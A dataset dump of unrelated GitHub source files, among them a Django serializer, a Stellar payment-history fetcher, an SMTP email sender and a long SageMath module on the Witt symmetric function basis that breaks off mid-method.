+{"seq_id":"10688379668","text":"from rest_framework import serializers\n\nfrom record.models import Record\n\n\nclass RecordSerializer(serializers.ModelSerializer):\n\n class Meta:\n\n model = Record\n fields = [\"meeting_id\",\"status\"]\nclass RecordDownloadSerializer(serializers.ModelSerializer):\n\n \"\"\"Docstring for RecordDownloadSerializer. \"\"\"\n\n class Meta:\n\n model = Record\n fields = [\"meeting_id\",\"video\"]\n\n\n\nclass RecordSocketSerializer(serializers.Serializer):\n meeting_id = serializers.CharField(max_length=64)\n status = serializers.IntegerField()\n status_message = serializers.CharField(max_length=64)\n\nclass RecordPostSerializer(serializers.Serializer):\n url = serializers.URLField()\nclass RecordRequestSerializer(serializers.Serializer):\n meeting_id = serializers.CharField(max_length=64)\n","repo_name":"odairmario/lassar-api","sub_path":"record/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22037718323","text":"import requests\n\n# address = \"GCORXHCLQ256IPQCWD3RCJXKPYD6BECF2TUKDRRMN6XR6UXP3XK7DYWU\"\n\n\ndef get_transactions_xlm(wallet_address):\n responses = []\n api_url = f'https://horizon.stellar.org/accounts/{wallet_address}/payments?cursor=&limit=100&order=desc'\n response = requests.get(api_url).json()['_embedded']['records']\n for tx in response:\n # print(tx)\n tx_hash = tx['transaction_hash']\n from_address = tx['from']\n to_address = tx['to']\n amount = tx['amount']\n if from_address == wallet_address:\n responses.insert(0, {\"tx\": tx_hash, \"type\": \"OUT\", \"amount\": amount})\n elif to_address == wallet_address:\n responses.insert(0, {\"tx\": tx_hash, \"type\": \"IN\", \"amount\": amount})\n return responses\n\n\n# get_transactions_xlm(wallet_address=address)\n","repo_name":"AminMortezaie/django-tutorial","sub_path":"ExchangeSystem/cosmos-app/transaction_history/get_tx/xlm_get_transaction_history.py","file_name":"xlm_get_transaction_history.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"18964183434","text":"from setuptools import find_packages, setup\n\ndocs_requirements = []\n\ninstallation_requirements = []\n\nsetup_requirements = [\n \"pytest-runner\"\n]\n\ntest_requirements = [\n \"pytest\",\n \"cerberus\",\n]\n\nsetup(\n name='MyPackageName',\n version='1.0.0',\n url='https://github.com/mypackage.git',\n author='Author Name',\n author_email='author@gmail.com',\n description='Description of my package',\n packages=find_packages(), \n install_requires=installation_requirements,\n setup_requires=setup_requirements,\n extras_require={\n 'docs': docs_requirements,\n 'test': test_requirements,\n }\n)\n","repo_name":"elben10/travis2","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71034572279","text":"from pycarmaker import CarMaker, Quantity\nimport time\n\n# 1 - Initialize pyCarMaker\nIP_ADDRESS = \"localhost\"\nPORT = 16660\ncm = CarMaker(IP_ADDRESS, PORT)\n\n# 2 - Connect to CarMaker\ncm.connect()\n\n# 3 - Create a Quantity\nqbrake = Quantity(\"DM.Brake\", Quantity.FLOAT)\n\n# 4 - Press the Brake\ncm.DVA_write(qbrake, 1)\n# cm.send(\"DVAReleaseQuants\\r\")\n\n# 5 - wait for 5 seconds\ntime.sleep(5)\n\n# 6 - Release the Brake\ncm.DVA_write(qbrake, 0)\n\n# 7 - Wait for 5 seconds\ntime.sleep(5)\n\n# 8 - Release the DVA\ncm.DVA_release()\n","repo_name":"gmnvh/pycarmaker","sub_path":"examples/Ex04_DVAWrite.py","file_name":"Ex04_DVAWrite.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"40"} +{"seq_id":"28005217100","text":"import abc\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom smtplib import SMTP\n\nfrom loguru import logger\nfrom retry import retry\n\nfrom common.config import settings\nfrom produces import rabbit_producer\n\n\nclass AbstractSender(abc.ABC):\n @abc.abstractmethod\n def send_message(self) -> int:\n pass\n\n\nclass EmailSender(AbstractSender):\n def __init__(self, email: dict, smtp_conn: smtplib.SMTP):\n self.email = email\n self.smtp_conn = smtp_conn\n\n def send_message(self):\n message = MIMEMultipart(\"alternative\")\n message[\"From\"] = \"from@example.com\"\n message[\"To\"] = \",\".join([self.email.get(\"email\")])\n message[\"Subject\"] = self.email.get(\"subject\")\n message.attach(MIMEText(self.email.get(\"text\"), \"plain\"))\n message.attach(MIMEText(self.email.get(\"html\"), \"html\"))\n\n try:\n self.smtp_conn.sendmail(\n message.get(\"From\"),\n message.get(\"To\"),\n message.as_string(),\n )\n logger.info(message.as_string())\n except (smtplib.SMTPRecipientsRefused, smtplib.SMTPSenderRefused) as exc:\n logger.exception(exc)\n rabbit_producer(settings.death_queue, self.email)\n\n\nclass SMTPConnection:\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.conn = self.create_connection()\n\n def test_conn_open(self):\n try:\n status = self.conn.noop()[0]\n except smtplib.SMTPServerDisconnected:\n status = -1\n return True if status == 250 else False\n\n @retry(\n backoff=settings.backoff_factor,\n delay=settings.backoff_start_sleep_time,\n max_delay=settings.backoff_border_sleep_time,\n logger=logger,\n )\n def create_connection(self):\n return SMTP(self.host, self.port)\n","repo_name":"AndreiUkladchikov/YandexPracticumTeam","sub_path":"notification/sender_worker/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70150895480","text":"from . import multiplicative\nfrom sage.matrix.constructor import matrix\n\n\nclass SymmetricFunctionAlgebra_witt(multiplicative.SymmetricFunctionAlgebra_multiplicative):\n r\"\"\"\n The Witt symmetric function basis (or Witt basis, to be short).\n\n The Witt basis of the ring of symmetric functions is\n denoted by `(x_{\\lambda})` in [HazWitt1]_, section 9.63, and by\n `(q_{\\lambda})` in [DoranIV1996]_. We will denote this basis by\n `(w_{\\lambda})` (which is precisely how it is denoted in\n [GriRei18]_, Exercise 2.9.3(d)). It is a multiplicative basis\n (meaning that `w_{\\emptyset} = 1` and that every partition\n `\\lambda` satisfies\n `w_{\\lambda} = w_{\\lambda_1} w_{\\lambda_2} w_{\\lambda_3} \\cdots`,\n where `w_i` means `w_{(i)}` for every nonnegative integer `i`).\n\n This basis can be defined in various ways. Probably the most\n well-known one is using the equation\n\n .. MATH::\n\n \\prod_{d=1}^{\\infty} (1 - w_d t^d)^{-1} = \\sum_{n=0}^{\\infty} h_n t^n\n\n where `t` is a formal variable and `h_n` are the complete\n homogeneous symmetric functions, extended to `0` by `h_0 = 1`.\n This equation allows one to uniquely determine the functions\n `w_1, w_2, w_3, \\ldots` by recursion; one consequently extends the\n definition to all `w_{\\lambda}` by requiring multiplicativity.\n\n A way to rewrite the above equation without power series is:\n\n .. MATH::\n\n h_n = \\sum_{\\lambda \\vdash n} w_{\\lambda}\n\n for all nonnegative integers `n`, where `\\lambda \\vdash n` means\n that `\\lambda` is a partition of `n`.\n\n A similar equation (which is easily seen to be equivalent to the\n former) is\n\n .. MATH::\n\n e_n = \\sum_{\\lambda} (-1)^{n - \\ell(\\lambda)} w_{\\lambda},\n\n with the sum running only over *strict* partitions `\\lambda` of\n `n` this time. This equation can also be used to recursively\n define the `w_n`. Furthermore, every positive integer `n`\n satisfies\n\n .. MATH::\n\n p_n = \\sum_{d\\mid n} d w_d^{n/d},\n\n and this can be used to define the `w_n` recursively over any\n ring which is torsion-free as a `\\ZZ`-module. While these\n equations all yield easy formulas for classical bases of the\n ring of symmetric functions in terms of the Witt symmetric\n functions, it seems difficult to obtain explicit formulas in\n the other direction.\n\n The Witt symmetric functions owe their name to the fact that\n the ring of symmetric functions can be viewed as the coordinate\n ring of the group scheme of Witt vectors, and the Witt\n symmetric functions are the functions that send a Witt vector\n to its components (whereas the powersum symmetric functions\n send a Witt vector to its ghost components). Details can be\n found in [HazWitt1]_ or section 3.2 of [BorWi2004]_.\n\n INPUT:\n\n - ``Sym`` -- an instance of the ring of the symmetric functions.\n - ``coerce_h`` -- (default: ``True``) a boolean that determines\n whether the transition maps between the Witt basis and the\n complete homogeneous basis will be cached and registered as\n coercions.\n - ``coerce_e`` -- (default: ``False``) a boolean that determines\n whether the transition maps between the Witt basis and the\n elementary symmetric basis will be cached and registered as\n coercions.\n - ``coerce_p`` -- (default: ``False``) a boolean that determines\n whether the transition maps between the Witt basis and the\n powersum basis will be cached and registered as coercions (or\n conversions, if the base ring is not a `\\QQ`-algebra).\n\n REFERENCES:\n\n .. [HazWitt1] Michiel Hazewinkel. *Witt vectors. Part 1*.\n :arxiv:`0804.3888v1`\n\n .. [DoranIV1996] William F. Doran IV.\n *A Proof of Reutenauer's `-q_{(n)}` Conjecture*.\n Journal of combinatorial theory, Series A 74, pp. 342-344 (1996),\n article no. 0056. :doi:`10.1006/jcta.1996.0056`\n\n .. [BorWi2004] James Borger, Ben Wieland.\n *Plethystic algebra*.\n :arxiv:`math/0407227v1`\n\n .. [GriRei18]_\n\n EXAMPLES:\n\n Here are the first few Witt symmetric functions, in various bases::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w()\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: p = Sym.p()\n sage: s = Sym.s()\n sage: m = Sym.m()\n\n sage: p(w([1]))\n p[1]\n sage: m(w([1]))\n m[1]\n sage: e(w([1]))\n e[1]\n sage: h(w([1]))\n h[1]\n sage: s(w([1]))\n s[1]\n\n sage: p(w([2]))\n -1/2*p[1, 1] + 1/2*p[2]\n sage: m(w([2]))\n -m[1, 1]\n sage: e(w([2]))\n -e[2]\n sage: h(w([2]))\n -h[1, 1] + h[2]\n sage: s(w([2]))\n -s[1, 1]\n\n sage: p(w([3]))\n -1/3*p[1, 1, 1] + 1/3*p[3]\n sage: m(w([3]))\n -2*m[1, 1, 1] - m[2, 1]\n sage: e(w([3]))\n -e[2, 1] + e[3]\n sage: h(w([3]))\n -h[2, 1] + h[3]\n sage: s(w([3]))\n -s[2, 1]\n\n sage: Sym = SymmetricFunctions(ZZ)\n sage: w = Sym.w()\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: s = Sym.s()\n sage: m = Sym.m()\n sage: p = Sym.p()\n sage: m(w([4]))\n -9*m[1, 1, 1, 1] - 4*m[2, 1, 1] - 2*m[2, 2] - m[3, 1]\n sage: e(w([4]))\n -e[2, 1, 1] + e[3, 1] - e[4]\n sage: h(w([4]))\n -h[1, 1, 1, 1] + 2*h[2, 1, 1] - h[2, 2] - h[3, 1] + h[4]\n sage: s(w([4]))\n -s[1, 1, 1, 1] - s[2, 1, 1] - s[2, 2] - s[3, 1]\n\n Some examples of conversions the other way::\n\n sage: w(h[3])\n w[1, 1, 1] + w[2, 1] + w[3]\n sage: w(e[3])\n -w[2, 1] + w[3]\n sage: w(m[2,1])\n 2*w[2, 1] - 3*w[3]\n sage: w(p[3])\n w[1, 1, 1] + 3*w[3]\n\n Antipodes::\n\n sage: w([1]).antipode()\n -w[1]\n sage: w([2]).antipode()\n -w[1, 1] - w[2]\n\n The following holds for all odd `i` and is easily proven by\n induction::\n\n sage: all( w([i]).antipode() == -w([i]) for i in range(1, 10, 2) )\n True\n\n The Witt basis does not allow for simple expressions for\n comultiplication and antipode in general (this is related to the\n fact that the sum of two Witt vectors isn't easily described in\n terms of the components). Therefore, most computations with Witt\n symmetric functions, as well as conversions and coercions, pass\n through the complete homogeneous symmetric functions by default.\n However, one can also use the elementary symmetric functions\n instead, or (if the base ring is a `\\QQ`-algebra) the powersum\n symmetric functions. This is what the optional keyword variables\n ``coerce_e``, ``coerce_h`` and ``coerce_p`` are for. These\n variables do not affect the results of the (non-underscored)\n methods of ``self``, but they affect the speed of the computations\n (the more of these variables are set to ``True``, the\n faster these are) and the size of the cache (the more of\n these variables are set to ``True``, the bigger the cache). Let us\n check that the results are the same no matter to what the\n variables are set::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: p = Sym.p()\n sage: wh = Sym.w()\n sage: we = Sym.w(coerce_h=False, coerce_e=True)\n sage: wp = Sym.w(coerce_h=False, coerce_p=True)\n sage: all( p(wh(lam)) == p(we(lam)) == p(wp(lam)) for lam in Partitions(4) )\n True\n sage: all ( wh(p(lam)).monomial_coefficients()\n ....: == we(p(lam)).monomial_coefficients()\n ....: == wp(p(lam)).monomial_coefficients() for lam in Partitions(4) )\n True\n\n TESTS:\n\n Let us check that all the above computations work with a\n non-default setting as well::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w(coerce_h=False, coerce_p=True)\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: p = Sym.p()\n sage: s = Sym.s()\n sage: m = Sym.m()\n\n sage: p(w([1]))\n p[1]\n sage: m(w([1]))\n m[1]\n sage: e(w([1]))\n e[1]\n sage: h(w([1]))\n h[1]\n sage: s(w([1]))\n s[1]\n\n sage: p(w([2]))\n -1/2*p[1, 1] + 1/2*p[2]\n sage: m(w([2]))\n -m[1, 1]\n sage: e(w([2]))\n -e[2]\n sage: h(w([2]))\n -h[1, 1] + h[2]\n sage: s(w([2]))\n -s[1, 1]\n\n sage: p(w([3]))\n -1/3*p[1, 1, 1] + 1/3*p[3]\n sage: m(w([3]))\n -2*m[1, 1, 1] - m[2, 1]\n sage: e(w([3]))\n -e[2, 1] + e[3]\n sage: h(w([3]))\n -h[2, 1] + h[3]\n sage: s(w([3]))\n -s[2, 1]\n\n sage: Sym = SymmetricFunctions(ZZ)\n sage: w = Sym.w()\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: s = Sym.s()\n sage: m = Sym.m()\n sage: p = Sym.p()\n sage: m(w([4]))\n -9*m[1, 1, 1, 1] - 4*m[2, 1, 1] - 2*m[2, 2] - m[3, 1]\n sage: e(w([4]))\n -e[2, 1, 1] + e[3, 1] - e[4]\n sage: h(w([4]))\n -h[1, 1, 1, 1] + 2*h[2, 1, 1] - h[2, 2] - h[3, 1] + h[4]\n sage: s(w([4]))\n -s[1, 1, 1, 1] - s[2, 1, 1] - s[2, 2] - s[3, 1]\n\n sage: w(h[3])\n w[1, 1, 1] + w[2, 1] + w[3]\n sage: w(e[3])\n -w[2, 1] + w[3]\n sage: w(m[2,1])\n 2*w[2, 1] - 3*w[3]\n sage: w(p[3])\n w[1, 1, 1] + 3*w[3]\n\n sage: w([1]).antipode()\n -w[1]\n sage: w([2]).antipode()\n -w[1, 1] - w[2]\n sage: all( w([i]).antipode() == -w([i]) for i in range(1, 10, 2) )\n True\n\n Another non-default setting::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w(coerce_h=False, coerce_e=True)\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: p = Sym.p()\n sage: s = Sym.s()\n sage: m = Sym.m()\n\n sage: p(w([1]))\n p[1]\n sage: m(w([1]))\n m[1]\n sage: e(w([1]))\n e[1]\n sage: h(w([1]))\n h[1]\n sage: s(w([1]))\n s[1]\n\n sage: p(w([2]))\n -1/2*p[1, 1] + 1/2*p[2]\n sage: m(w([2]))\n -m[1, 1]\n sage: e(w([2]))\n -e[2]\n sage: h(w([2]))\n -h[1, 1] + h[2]\n sage: s(w([2]))\n -s[1, 1]\n\n sage: p(w([3]))\n -1/3*p[1, 1, 1] + 1/3*p[3]\n sage: m(w([3]))\n -2*m[1, 1, 1] - m[2, 1]\n sage: e(w([3]))\n -e[2, 1] + e[3]\n sage: h(w([3]))\n -h[2, 1] + h[3]\n sage: s(w([3]))\n -s[2, 1]\n\n sage: Sym = SymmetricFunctions(ZZ)\n sage: w = Sym.w()\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: s = Sym.s()\n sage: m = Sym.m()\n sage: p = Sym.p()\n sage: m(w([4]))\n -9*m[1, 1, 1, 1] - 4*m[2, 1, 1] - 2*m[2, 2] - m[3, 1]\n sage: e(w([4]))\n -e[2, 1, 1] + e[3, 1] - e[4]\n sage: h(w([4]))\n -h[1, 1, 1, 1] + 2*h[2, 1, 1] - h[2, 2] - h[3, 1] + h[4]\n sage: s(w([4]))\n -s[1, 1, 1, 1] - s[2, 1, 1] - s[2, 2] - s[3, 1]\n sage: [type(coeff) for a, coeff in h(w([4]))]\n [,\n ,\n ,\n ,\n ]\n\n sage: w(h[3])\n w[1, 1, 1] + w[2, 1] + w[3]\n sage: w(e[3])\n -w[2, 1] + w[3]\n sage: w(m[2,1])\n 2*w[2, 1] - 3*w[3]\n sage: w(p[3])\n w[1, 1, 1] + 3*w[3]\n\n sage: w([1]).antipode()\n -w[1]\n sage: w([2]).antipode()\n -w[1, 1] - w[2]\n sage: all( w([i]).antipode() == -w([i]) for i in range(1, 10, 2) )\n ....: #this holds for all odd i and is easily proven by induction\n True\n \"\"\"\n\n def __init__(self, Sym, coerce_h=True, coerce_e=False, coerce_p=False):\n \"\"\"\n Initialize ``self``.\n\n TESTS::\n\n sage: w = SymmetricFunctions(QQ).w()\n sage: TestSuite(w).run(skip=['_test_associativity', '_test_distributivity', '_test_prod'])\n sage: TestSuite(w).run(elements = [w[1,1]+w[2], w[1]+2*w[1,1]])\n \"\"\"\n self._coerce_h = coerce_h\n self._coerce_e = coerce_e\n self._coerce_p = coerce_p\n multiplicative.SymmetricFunctionAlgebra_multiplicative.__init__(self, Sym, \"Witt\", 'w')\n\n def _precompute_cache(self, n, to_self_cache, from_self_cache, transition_matrices, inverse_transition_matrices, to_self_gen_function):\n \"\"\"\n Compute the transition matrices between ``self`` and another\n multiplicative homogeneous basis in the homogeneous components of\n degree `n`.\n\n The results are not returned, but rather stored in the caches.\n\n This assumes that the transition matrices in all degrees smaller\n than `n` have already been computed and cached!\n\n INPUT:\n\n - ``n`` -- nonnegative integer\n - ``to_self_cache`` -- a cache which stores the coordinates of\n the elements of the other basis with respect to the\n basis ``self``\n - ``from_self_cache`` -- a cache which stores the coordinates\n of the elements of ``self`` with respect to the other\n basis\n - ``transition_matrices`` -- a cache for transition matrices\n which contain the coordinates of the elements of the other\n basis with respect to ``self``\n - ``inverse_transition_matrices`` -- a cache for transition\n matrices which contain the coordinates of the elements of\n ``self`` with respect to the other basis\n - ``to_self_gen_function`` -- a function which takes a\n positive integer `n` and returns the element of the other\n basis corresponding to the partition `[n]` expanded with\n respect to the Witt basis ``self`` (as an element of\n ``self``, not as a dictionary)\n\n Examples for usage of this function are the ``_precompute_h``,\n ``_precompute_e`` and ``_precompute_p`` methods of this class.\n\n EXAMPLES:\n\n The examples below demonstrate how the caches are built\n step by step using the ``_precompute_cache`` method. In order\n not to influence the outcome of other doctests, we make sure\n not to use the caches internally used by this class, but\n rather to create new caches::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w()\n sage: toy_to_self_cache = {}\n sage: toy_from_self_cache = {}\n sage: toy_transition_matrices = {}\n sage: toy_inverse_transition_matrices = {}\n sage: l = lambda c: [ (i[0],[j for j in sorted(i[1].items())]) for i in sorted(c.items())]\n sage: l(toy_to_self_cache)\n []\n sage: def toy_gen_function(n):\n ....: if n > 1:\n ....: return w(Partition([n])) + n * w(Partition([n-1,1]))\n ....: return w(Partition([n]))\n sage: w._precompute_cache(0, toy_to_self_cache,\n ....: toy_from_self_cache,\n ....: toy_transition_matrices,\n ....: toy_inverse_transition_matrices,\n ....: toy_gen_function)\n sage: l(toy_to_self_cache)\n [([], [([], 1)])]\n sage: w._precompute_cache(1, toy_to_self_cache,\n ....: toy_from_self_cache,\n ....: toy_transition_matrices,\n ....: toy_inverse_transition_matrices,\n ....: toy_gen_function)\n sage: l(toy_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)])]\n sage: w._precompute_cache(2, toy_to_self_cache,\n ....: toy_from_self_cache,\n ....: toy_transition_matrices,\n ....: toy_inverse_transition_matrices,\n ....: toy_gen_function)\n sage: l(toy_to_self_cache)\n [([], [([], 1)]),\n ([1], [([1], 1)]),\n ([1, 1], [([1, 1], 1)]),\n ([2], [([1, 1], 2), ([2], 1)])]\n sage: toy_transition_matrices[2]\n [1 2]\n [0 1]\n sage: toy_inverse_transition_matrices[2]\n [ 1 -2]\n [ 0 1]\n sage: sorted(toy_transition_matrices)\n [0, 1, 2]\n \"\"\"\n # Much of this code is adapted from dual.py\n base_ring = self.base_ring()\n zero = base_ring.zero()\n\n from sage.combinat.partition import Partition, Partitions_n\n\n # Handle the n == 0 case separately\n if n == 0:\n part = Partition([])\n one = base_ring.one()\n to_self_cache[ part ] = { part: one }\n from_self_cache[ part ] = { part: one }\n transition_matrices[n] = matrix(base_ring, [[one]])\n inverse_transition_matrices[n] = matrix(base_ring, [[one]])\n return\n\n partitions_n = Partitions_n(n).list()\n\n # The other basis will be called B from now on.\n\n # This contains the data for the transition matrix from the\n # basis B to the Witt basis self.\n transition_matrix_n = matrix(base_ring, len(partitions_n), len(partitions_n))\n\n # This first section calculates how the basis elements of the\n # basis B are expressed in terms of the Witt basis ``self``.\n\n # For every partition p of size n, expand B[p] in terms of\n # the Witt basis self using multiplicativity and\n # to_self_gen_function.\n i = 0\n for s_part in partitions_n:\n # s_mcs will be self(B[s_part])._monomial_coefficients\n s_mcs = {}\n\n # We need to compute the coordinates of B[s_part] in the Witt basis.\n hsp_in_w_basis = self.one()\n for p in s_part:\n hsp_in_w_basis *= to_self_gen_function(p)\n # Now, hsp_in_w_basis is B[s_part] expanded in the Witt\n # basis self (this is the same as the coercion self(B[s_part]).\n j = 0\n for p_part in partitions_n:\n\n if p_part in hsp_in_w_basis._monomial_coefficients:\n sp = hsp_in_w_basis._monomial_coefficients[p_part]\n s_mcs[p_part] = sp\n transition_matrix_n[i,j] = sp\n\n j += 1\n\n to_self_cache[ s_part ] = s_mcs\n i += 1\n\n # Save the transition matrix\n transition_matrices[n] = transition_matrix_n\n\n # This second section calculates how the basis elements of\n # self expand in terms of the basis B. We do this by\n # computing the inverse of the matrix transition_matrix_n\n # obtained above.\n # TODO: Possibly this can be sped up by using properties\n # of this matrix (e. g., it being triangular in most standard cases).\n # Are there significantly faster ways to invert a triangular\n # matrix (compared to the usual matrix inversion algorithms)?\n inverse_transition = (~transition_matrix_n).change_ring(base_ring)\n # Note that we don't simply write\n # \"inverse_transition = ~transition_matrix_n\" because that\n # tends to cast the entries of the matrix into a quotient\n # field even if this is unnecessary.\n\n # TODO: This still looks fragile when the base ring is weird!\n # Possibly work over ZZ in this method?\n\n for i in range(len(partitions_n)):\n d_mcs = {}\n for j in range(len(partitions_n)):\n if inverse_transition[i,j] != zero:\n d_mcs[ partitions_n[j] ] = inverse_transition[i,j]\n\n from_self_cache[ partitions_n[i] ] = d_mcs\n\n inverse_transition_matrices[n] = inverse_transition\n\n def _precompute_h(self, n):\n \"\"\"\n Compute the transition matrices between ``self`` and the complete\n homogeneous basis in the homogeneous components of degree `n`\n (and in those of smaller degree, if not already computed).\n The result is not returned, but rather stored in the cache.\n\n This assumes that the ``coerce_h`` keyword has been set to\n ``True`` in the initialization of ``self`` (otherwise the cache\n does not exist).\n\n INPUT:\n\n - ``n`` -- nonnegative integer\n\n EXAMPLES:\n\n The examples below demonstrate how the caches of ``w`` are built\n step by step using the ``_precompute_h`` method. Thus they rely on\n an untouched Witt symmetric basis that hasn't already seen some\n of its cache filled by other computations. We obtain such a basis\n by choosing a ground ring unlikely to appear elsewhere::\n\n sage: Sym = SymmetricFunctions(ZZ['hell', 'yeah'])\n sage: w = Sym.Witt()\n sage: l = lambda c: [ (i[0],[j for j in sorted(i[1].items())]) for i in sorted(c.items())]\n sage: l(w._h_to_self_cache)\n []\n sage: w._precompute_h(0)\n sage: l(w._h_to_self_cache)\n [([], [([], 1)])]\n sage: w._precompute_h(1)\n sage: l(w._h_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)])]\n sage: w._precompute_h(2)\n sage: l(w._h_to_self_cache)\n [([], [([], 1)]),\n ([1], [([1], 1)]),\n ([1, 1], [([1, 1], 1)]),\n ([2], [([1, 1], 1), ([2], 1)])]\n sage: w._h_transition_matrices[2]\n [1 1]\n [0 1]\n sage: w._h_inverse_transition_matrices[2]\n [ 1 -1]\n [ 0 1]\n sage: sorted(w._h_transition_matrices)\n [0, 1, 2]\n \"\"\"\n l = len(self._h_transition_matrices)\n if l <= n:\n from sage.combinat.partition import Partitions_n\n from sage.misc.cachefunc import cached_function\n\n @cached_function\n def wsum(m): # expansion of h_m in w-basis, for m > 0\n return self._from_dict({lam: 1 for lam in Partitions_n(m)})\n for i in range(l, n + 1):\n self._precompute_cache(i, self._h_to_self_cache,\n self._h_from_self_cache,\n self._h_transition_matrices,\n self._h_inverse_transition_matrices,\n wsum)\n\n def _precompute_e(self, n):\n \"\"\"\n Compute the transition matrices between ``self`` and the elementary\n symmetric basis in the homogeneous components of degree `n`\n (and in those of smaller degree, if not already computed).\n The result is not returned, but rather stored in the cache.\n\n This assumes that the ``coerce_e`` keyword has been set to\n ``True`` in the initialization of ``self`` (otherwise the cache\n does not exist).\n\n INPUT:\n\n - ``n`` -- nonnegative integer\n\n EXAMPLES:\n\n The examples below demonstrate how the caches of ``w`` are built\n step by step using the ``_precompute_e`` method. Thus they rely on\n an untouched Witt symmetric basis that hasn't already seen some\n of its cache filled by other computations. We obtain such a basis\n by choosing a ground ring unlikely to appear elsewhere::\n\n sage: Sym = SymmetricFunctions(ZZ['hell', 'yeah'])\n sage: w = Sym.Witt(coerce_e=True)\n sage: l = lambda c: [ (i[0],[j for j in sorted(i[1].items())]) for i in sorted(c.items())]\n sage: l(w._e_to_self_cache)\n []\n sage: w._precompute_e(0)\n sage: l(w._e_to_self_cache)\n [([], [([], 1)])]\n sage: w._precompute_e(1)\n sage: l(w._e_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)])]\n sage: w._precompute_e(2)\n sage: l(w._e_to_self_cache)\n [([], [([], 1)]),\n ([1], [([1], 1)]),\n ([1, 1], [([1, 1], 1)]),\n ([2], [([2], -1)])]\n sage: w._e_transition_matrices[2]\n [-1 0]\n [ 0 1]\n sage: w._e_inverse_transition_matrices[2]\n [-1 0]\n [ 0 1]\n \"\"\"\n l = len(self._e_transition_matrices)\n if l <= n:\n from sage.combinat.partition import Partitions\n from sage.misc.cachefunc import cached_function\n\n @cached_function\n def wsum_e(m): # expansion of e_m in w-basis, for m > 0\n return self._from_dict({lam: (-1 if (m + len(lam)) % 2 == 1 else 1)\n for lam in Partitions(m, max_slope=-1)})\n for i in range(l, n + 1):\n self._precompute_cache(i, self._e_to_self_cache,\n self._e_from_self_cache,\n self._e_transition_matrices,\n self._e_inverse_transition_matrices,\n wsum_e)\n\n def _precompute_p(self, n):\n \"\"\"\n Compute the transition matrices between ``self`` and the powersum\n basis in the homogeneous components of degree `n`\n (and in those of smaller degree, if not already computed).\n The result is not returned, but rather stored in the cache.\n\n This assumes that the ``coerce_p`` keyword has been set to\n ``True`` in the initialization of ``self`` (otherwise the cache\n does not exist).\n\n INPUT:\n\n - ``n`` -- nonnegative integer\n\n EXAMPLES:\n\n The examples below demonstrate how the caches of ``w`` are built\n step by step using the ``_precompute_p`` method. Thus they rely on\n an untouched Witt symmetric basis that hasn't already seen some\n of its cache filled by other computations. We obtain such a basis\n by choosing a ground ring unlikely to appear elsewhere::\n\n sage: Sym = SymmetricFunctions(QQ['hell', 'yeah'])\n sage: w = Sym.Witt(coerce_h=False, coerce_e=True, coerce_p=True)\n sage: l = lambda c: [ (i[0],[j for j in sorted(i[1].items())]) for i in sorted(c.items())]\n sage: l(w._p_to_self_cache)\n []\n sage: w._precompute_p(0)\n sage: l(w._p_to_self_cache)\n [([], [([], 1)])]\n sage: w._precompute_p(1)\n sage: l(w._p_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)])]\n sage: w._precompute_p(2)\n sage: l(w._p_to_self_cache)\n [([], [([], 1)]), ([1], [([1], 1)]), ([1, 1], [([1, 1], 1)]), ([2], [([1, 1], 1), ([2], 2)])]\n sage: w._p_transition_matrices[2]\n [2 1]\n [0 1]\n sage: w._p_inverse_transition_matrices[2]\n [ 1/2 -1/2]\n [ 0 1]\n \"\"\"\n l = len(self._p_transition_matrices)\n if l <= n:\n from sage.arith.all import divisors\n from sage.combinat.partition import Partition\n from sage.misc.cachefunc import cached_function\n\n @cached_function\n def wsum_p(m): # expansion of p_m in w-basis, for m > 0\n return self._from_dict({Partition([d] * (m // d)): d\n for d in divisors(m)})\n for i in range(l, n + 1):\n self._precompute_cache(i, self._p_to_self_cache,\n self._p_from_self_cache,\n self._p_transition_matrices,\n self._p_inverse_transition_matrices,\n wsum_p)\n\n def _h_to_w_on_basis(self, lam):\n r\"\"\"\n Return the complete homogeneous symmetric function ``h[lam]``\n expanded in the Witt basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_h`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``h[lam]`` in the Witt basis ``self``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: h = Sym.homogeneous()\n sage: w = Sym.w()\n sage: w._h_to_w_on_basis(Partition([]))\n w[]\n sage: w._h_to_w_on_basis(Partition([4,2,1]))\n w[1, 1, 1, 1, 1, 1, 1] + 2*w[2, 1, 1, 1, 1, 1] + 2*w[2, 2, 1, 1, 1] + w[2, 2, 2, 1] + w[3, 1, 1, 1, 1] + w[3, 2, 1, 1] + w[4, 1, 1, 1] + w[4, 2, 1]\n sage: h(w._h_to_w_on_basis(Partition([3,1]))) == h[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_h(n)\n return 